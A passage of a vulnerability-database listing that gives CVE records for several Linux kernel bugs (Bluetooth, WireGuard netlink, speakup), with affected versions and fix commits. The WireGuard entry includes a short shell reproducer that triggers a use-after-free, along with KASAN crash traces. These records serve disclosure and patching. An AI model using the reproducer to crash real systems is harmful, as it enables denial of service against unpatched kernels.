"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.1"
},
{
"lessThan": "4.1",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.313",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.275",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.216",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.156",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.87",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.28",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.7",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.313",
"versionStartIncluding": "4.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.275",
"versionStartIncluding": "4.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.216",
"versionStartIncluding": "4.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.156",
"versionStartIncluding": "4.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.87",
"versionStartIncluding": "4.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.28",
"versionStartIncluding": "4.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.7",
"versionStartIncluding": "4.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "4.1",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: Fix memory leak in hci_req_sync_complete()\n\nIn \u0027hci_req_sync_complete()\u0027, always free the previous sync\nrequest state before assigning reference to a new one."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:09:43.997Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/89a32741f4217856066c198a4a7267bcdd1edd67"
},
{
"url": "https://git.kernel.org/stable/c/4beab84fbb50df3be1d8f8a976e6fe882ca65cb2"
},
{
"url": "https://git.kernel.org/stable/c/8478394f76c748862ef179a16f651f752bdafaf0"
},
{
"url": "https://git.kernel.org/stable/c/75193678cce993aa959e7764b6df2f599886dd06"
},
{
"url": "https://git.kernel.org/stable/c/66fab1e120b39f8f47a94186ddee36006fc02ca8"
},
{
"url": "https://git.kernel.org/stable/c/9ab5e44b9bac946bd49fd63264a08cd1ea494e76"
},
{
"url": "https://git.kernel.org/stable/c/e4cb8382fff6706436b66eafd9c0ee857ff0a9f5"
},
{
"url": "https://git.kernel.org/stable/c/45d355a926ab40f3ae7bc0b0a00cb0e3e8a5a810"
}
],
"title": "Bluetooth: Fix memory leak in hci_req_sync_complete()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-35978",
"datePublished": "2024-05-20T09:42:03.759Z",
"dateReserved": "2024-05-17T13:50:33.144Z",
"dateUpdated": "2025-05-04T09:09:43.997Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-35967 (GCVE-0-2024-35967)
Vulnerability from cvelistv5
Published
2024-05-20 09:41
Modified
2025-05-04 09:09
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
Bluetooth: SCO: Fix not validating setsockopt user input
syzbot reported sco_sock_setsockopt() is copying data without
checking user input length.
BUG: KASAN: slab-out-of-bounds in copy_from_sockptr_offset
include/linux/sockptr.h:49 [inline]
BUG: KASAN: slab-out-of-bounds in copy_from_sockptr
include/linux/sockptr.h:55 [inline]
BUG: KASAN: slab-out-of-bounds in sco_sock_setsockopt+0xc0b/0xf90
net/bluetooth/sco.c:893
Read of size 4 at addr ffff88805f7b15a3 by task syz-executor.5/12578
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: b96e9c671b05f95126753a22145d4509d45ca197 Version: b96e9c671b05f95126753a22145d4509d45ca197 Version: b96e9c671b05f95126753a22145d4509d45ca197 Version: b96e9c671b05f95126753a22145d4509d45ca197 Version: b96e9c671b05f95126753a22145d4509d45ca197 Version: b96e9c671b05f95126753a22145d4509d45ca197 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-35967",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-20T17:01:27.722344Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:33:26.743Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:21:49.126Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b0e30c37695b614bee69187f86eaf250e36606ce"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7bc65d23ba20dcd7ecc094a12c181e594e5eb315"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/72473db90900da970a16ee50ad23c2c38d107d8c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/419a0ffca7010216f0fc265b08558d7394fa0ba7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/51eda36d33e43201e7a4fd35232e069b2c850b01"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"include/net/bluetooth/bluetooth.h",
"net/bluetooth/sco.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "b0e30c37695b614bee69187f86eaf250e36606ce",
"status": "affected",
"version": "b96e9c671b05f95126753a22145d4509d45ca197",
"versionType": "git"
},
{
"lessThan": "2c2dc87cdebef3fe3b9d7a711a984c70e376e32e",
"status": "affected",
"version": "b96e9c671b05f95126753a22145d4509d45ca197",
"versionType": "git"
},
{
"lessThan": "7bc65d23ba20dcd7ecc094a12c181e594e5eb315",
"status": "affected",
"version": "b96e9c671b05f95126753a22145d4509d45ca197",
"versionType": "git"
},
{
"lessThan": "72473db90900da970a16ee50ad23c2c38d107d8c",
"status": "affected",
"version": "b96e9c671b05f95126753a22145d4509d45ca197",
"versionType": "git"
},
{
"lessThan": "419a0ffca7010216f0fc265b08558d7394fa0ba7",
"status": "affected",
"version": "b96e9c671b05f95126753a22145d4509d45ca197",
"versionType": "git"
},
{
"lessThan": "51eda36d33e43201e7a4fd35232e069b2c850b01",
"status": "affected",
"version": "b96e9c671b05f95126753a22145d4509d45ca197",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"include/net/bluetooth/bluetooth.h",
"net/bluetooth/sco.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.8"
},
{
"lessThan": "3.8",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.216",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.178",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.87",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.28",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.7",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.216",
"versionStartIncluding": "3.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.178",
"versionStartIncluding": "3.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.87",
"versionStartIncluding": "3.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.28",
"versionStartIncluding": "3.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.7",
"versionStartIncluding": "3.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "3.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: SCO: Fix not validating setsockopt user input\n\nsyzbot reported sco_sock_setsockopt() is copying data without\nchecking user input length.\n\nBUG: KASAN: slab-out-of-bounds in copy_from_sockptr_offset\ninclude/linux/sockptr.h:49 [inline]\nBUG: KASAN: slab-out-of-bounds in copy_from_sockptr\ninclude/linux/sockptr.h:55 [inline]\nBUG: KASAN: slab-out-of-bounds in sco_sock_setsockopt+0xc0b/0xf90\nnet/bluetooth/sco.c:893\nRead of size 4 at addr ffff88805f7b15a3 by task syz-executor.5/12578"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:09:25.456Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/b0e30c37695b614bee69187f86eaf250e36606ce"
},
{
"url": "https://git.kernel.org/stable/c/2c2dc87cdebef3fe3b9d7a711a984c70e376e32e"
},
{
"url": "https://git.kernel.org/stable/c/7bc65d23ba20dcd7ecc094a12c181e594e5eb315"
},
{
"url": "https://git.kernel.org/stable/c/72473db90900da970a16ee50ad23c2c38d107d8c"
},
{
"url": "https://git.kernel.org/stable/c/419a0ffca7010216f0fc265b08558d7394fa0ba7"
},
{
"url": "https://git.kernel.org/stable/c/51eda36d33e43201e7a4fd35232e069b2c850b01"
}
],
"title": "Bluetooth: SCO: Fix not validating setsockopt user input",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-35967",
"datePublished": "2024-05-20T09:41:56.503Z",
"dateReserved": "2024-05-17T13:50:33.140Z",
"dateUpdated": "2025-05-04T09:09:25.456Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26951 (GCVE-0-2024-26951)
Vulnerability from cvelistv5
Published
2024-05-01 05:18
Modified
2025-05-04 09:00
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
wireguard: netlink: check for dangling peer via is_dead instead of empty list
If all peers are removed via wg_peer_remove_all(), rather than setting
peer_list to empty, the peer is added to a temporary list with a head on
the stack of wg_peer_remove_all(). If a netlink dump is resumed and the
cursored peer is one that has been removed via wg_peer_remove_all(), it
will iterate from that peer and then attempt to dump freed peers.
Fix this by instead checking peer->is_dead, which was explictly created
for this purpose. Also move up the device_update_lock lockdep assertion,
since reading is_dead relies on that.
It can be reproduced by a small script like:
echo "Setting config..."
ip link add dev wg0 type wireguard
wg setconf wg0 /big-config
(
while true; do
echo "Showing config..."
wg showconf wg0 > /dev/null
done
) &
sleep 4
wg setconf wg0 <(printf "[Peer]\nPublicKey=$(wg genkey)\n")
Resulting in:
BUG: KASAN: slab-use-after-free in __lock_acquire+0x182a/0x1b20
Read of size 8 at addr ffff88811956ec70 by task wg/59
CPU: 2 PID: 59 Comm: wg Not tainted 6.8.0-rc2-debug+ #5
Call Trace:
<TASK>
dump_stack_lvl+0x47/0x70
print_address_description.constprop.0+0x2c/0x380
print_report+0xab/0x250
kasan_report+0xba/0xf0
__lock_acquire+0x182a/0x1b20
lock_acquire+0x191/0x4b0
down_read+0x80/0x440
get_peer+0x140/0xcb0
wg_get_device_dump+0x471/0x1130
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: e7096c131e5161fa3b8e52a650d7719d2857adfd Version: e7096c131e5161fa3b8e52a650d7719d2857adfd Version: e7096c131e5161fa3b8e52a650d7719d2857adfd Version: e7096c131e5161fa3b8e52a650d7719d2857adfd Version: e7096c131e5161fa3b8e52a650d7719d2857adfd Version: e7096c131e5161fa3b8e52a650d7719d2857adfd Version: e7096c131e5161fa3b8e52a650d7719d2857adfd |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:21:05.788Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f52be46e3e6ecefc2539119784324f0cbc09620a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/710a177f347282eea162aec8712beb1f42d5ad87"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b7cea3a9af0853fdbb1b16633a458f991dde6aac"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/13d107794304306164481d31ce33f8fdb25a9c04"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7bedfe4cfa38771840a355970e4437cd52d4046b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/302b2dfc013baca3dea7ceda383930d9297d231d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/55b6c738673871c9b0edae05d0c97995c1ff08c4"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26951",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:45:36.397018Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:32:58.386Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/wireguard/netlink.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "f52be46e3e6ecefc2539119784324f0cbc09620a",
"status": "affected",
"version": "e7096c131e5161fa3b8e52a650d7719d2857adfd",
"versionType": "git"
},
{
"lessThan": "710a177f347282eea162aec8712beb1f42d5ad87",
"status": "affected",
"version": "e7096c131e5161fa3b8e52a650d7719d2857adfd",
"versionType": "git"
},
{
"lessThan": "b7cea3a9af0853fdbb1b16633a458f991dde6aac",
"status": "affected",
"version": "e7096c131e5161fa3b8e52a650d7719d2857adfd",
"versionType": "git"
},
{
"lessThan": "13d107794304306164481d31ce33f8fdb25a9c04",
"status": "affected",
"version": "e7096c131e5161fa3b8e52a650d7719d2857adfd",
"versionType": "git"
},
{
"lessThan": "7bedfe4cfa38771840a355970e4437cd52d4046b",
"status": "affected",
"version": "e7096c131e5161fa3b8e52a650d7719d2857adfd",
"versionType": "git"
},
{
"lessThan": "302b2dfc013baca3dea7ceda383930d9297d231d",
"status": "affected",
"version": "e7096c131e5161fa3b8e52a650d7719d2857adfd",
"versionType": "git"
},
{
"lessThan": "55b6c738673871c9b0edae05d0c97995c1ff08c4",
"status": "affected",
"version": "e7096c131e5161fa3b8e52a650d7719d2857adfd",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/wireguard/netlink.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.6"
},
{
"lessThan": "5.6",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.215",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.154",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.84",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.24",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.215",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.154",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.84",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.24",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.12",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.3",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "5.6",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nwireguard: netlink: check for dangling peer via is_dead instead of empty list\n\nIf all peers are removed via wg_peer_remove_all(), rather than setting\npeer_list to empty, the peer is added to a temporary list with a head on\nthe stack of wg_peer_remove_all(). If a netlink dump is resumed and the\ncursored peer is one that has been removed via wg_peer_remove_all(), it\nwill iterate from that peer and then attempt to dump freed peers.\n\nFix this by instead checking peer-\u003eis_dead, which was explictly created\nfor this purpose. Also move up the device_update_lock lockdep assertion,\nsince reading is_dead relies on that.\n\nIt can be reproduced by a small script like:\n\n echo \"Setting config...\"\n ip link add dev wg0 type wireguard\n wg setconf wg0 /big-config\n (\n while true; do\n echo \"Showing config...\"\n wg showconf wg0 \u003e /dev/null\n done\n ) \u0026\n sleep 4\n wg setconf wg0 \u003c(printf \"[Peer]\\nPublicKey=$(wg genkey)\\n\")\n\nResulting in:\n\n BUG: KASAN: slab-use-after-free in __lock_acquire+0x182a/0x1b20\n Read of size 8 at addr ffff88811956ec70 by task wg/59\n CPU: 2 PID: 59 Comm: wg Not tainted 6.8.0-rc2-debug+ #5\n Call Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0x47/0x70\n print_address_description.constprop.0+0x2c/0x380\n print_report+0xab/0x250\n kasan_report+0xba/0xf0\n __lock_acquire+0x182a/0x1b20\n lock_acquire+0x191/0x4b0\n down_read+0x80/0x440\n get_peer+0x140/0xcb0\n wg_get_device_dump+0x471/0x1130"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:00:32.262Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/f52be46e3e6ecefc2539119784324f0cbc09620a"
},
{
"url": "https://git.kernel.org/stable/c/710a177f347282eea162aec8712beb1f42d5ad87"
},
{
"url": "https://git.kernel.org/stable/c/b7cea3a9af0853fdbb1b16633a458f991dde6aac"
},
{
"url": "https://git.kernel.org/stable/c/13d107794304306164481d31ce33f8fdb25a9c04"
},
{
"url": "https://git.kernel.org/stable/c/7bedfe4cfa38771840a355970e4437cd52d4046b"
},
{
"url": "https://git.kernel.org/stable/c/302b2dfc013baca3dea7ceda383930d9297d231d"
},
{
"url": "https://git.kernel.org/stable/c/55b6c738673871c9b0edae05d0c97995c1ff08c4"
}
],
"title": "wireguard: netlink: check for dangling peer via is_dead instead of empty list",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26951",
"datePublished": "2024-05-01T05:18:34.520Z",
"dateReserved": "2024-02-19T14:20:24.198Z",
"dateUpdated": "2025-05-04T09:00:32.262Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-38587 (GCVE-0-2024-38587)
Vulnerability from cvelistv5
Published
2024-06-19 13:37
Modified
2025-11-04 17:21
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
speakup: Fix sizeof() vs ARRAY_SIZE() bug
The "buf" pointer is an array of u16 values. This code should be
using ARRAY_SIZE() (which is 256) instead of sizeof() (which is 512),
otherwise it can the still got out of bounds.
References
| URL | Tags | ||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 756c5cb7c09e537b87b5d3acafcb101b2ccf394f Version: 8f6b62125befe1675446923e4171eac2c012959c Version: 6401038acfa24cba9c28cce410b7505efadd0222 Version: 0d130158db29f5e0b3893154908cf618896450a8 Version: 89af25bd4b4bf6a71295f07e07a8ae7dc03c6595 Version: 8defb1d22ba0395b81feb963b96e252b097ba76f Version: 0efb15c14c493263cb3a5f65f5ddfd4603d19a76 Version: c8d2f34ea96ea3bce6ba2535f867f0d4ee3b22e1 Version: c8d2f34ea96ea3bce6ba2535f867f0d4ee3b22e1 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-38587",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-20T14:49:14.118323Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "CWE-noinfo Not enough information",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-11-04T20:21:08.889Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2025-11-04T17:21:38.044Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/42f0a3f67158ed6b2908d2b9ffbf7e96d23fd358"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/cd7f3978c2ec741aedd1d860b2adb227314cf996"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/07ef95cc7a579731198c93beed281e3a79a0e586"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/504178fb7d9f6cdb0496d5491efb05f45597e535"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3726f75a1ccc16cd335c0ccfad1d92ee08ecba5e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c6e1650cf5df1bd6638eeee231a683ef30c7d4eb"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/eb1ea64328d4cc7d7a912c563f8523d5259716ef"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d52c04474feac8e305814a5228e622afe481b2ef"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/008ab3c53bc4f0b2f20013c8f6c204a3203d0b8b"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/accessibility/speakup/main.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "42f0a3f67158ed6b2908d2b9ffbf7e96d23fd358",
"status": "affected",
"version": "756c5cb7c09e537b87b5d3acafcb101b2ccf394f",
"versionType": "git"
},
{
"lessThan": "cd7f3978c2ec741aedd1d860b2adb227314cf996",
"status": "affected",
"version": "8f6b62125befe1675446923e4171eac2c012959c",
"versionType": "git"
},
{
"lessThan": "07ef95cc7a579731198c93beed281e3a79a0e586",
"status": "affected",
"version": "6401038acfa24cba9c28cce410b7505efadd0222",
"versionType": "git"
},
{
"lessThan": "504178fb7d9f6cdb0496d5491efb05f45597e535",
"status": "affected",
"version": "0d130158db29f5e0b3893154908cf618896450a8",
"versionType": "git"
},
{
"lessThan": "3726f75a1ccc16cd335c0ccfad1d92ee08ecba5e",
"status": "affected",
"version": "89af25bd4b4bf6a71295f07e07a8ae7dc03c6595",
"versionType": "git"
},
{
"lessThan": "c6e1650cf5df1bd6638eeee231a683ef30c7d4eb",
"status": "affected",
"version": "8defb1d22ba0395b81feb963b96e252b097ba76f",
"versionType": "git"
},
{
"lessThan": "eb1ea64328d4cc7d7a912c563f8523d5259716ef",
"status": "affected",
"version": "0efb15c14c493263cb3a5f65f5ddfd4603d19a76",
"versionType": "git"
},
{
"lessThan": "d52c04474feac8e305814a5228e622afe481b2ef",
"status": "affected",
"version": "c8d2f34ea96ea3bce6ba2535f867f0d4ee3b22e1",
"versionType": "git"
},
{
"lessThan": "008ab3c53bc4f0b2f20013c8f6c204a3203d0b8b",
"status": "affected",
"version": "c8d2f34ea96ea3bce6ba2535f867f0d4ee3b22e1",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/accessibility/speakup/main.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.9"
},
{
"lessThan": "6.9",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.316",
"versionType": "semver"
},
{
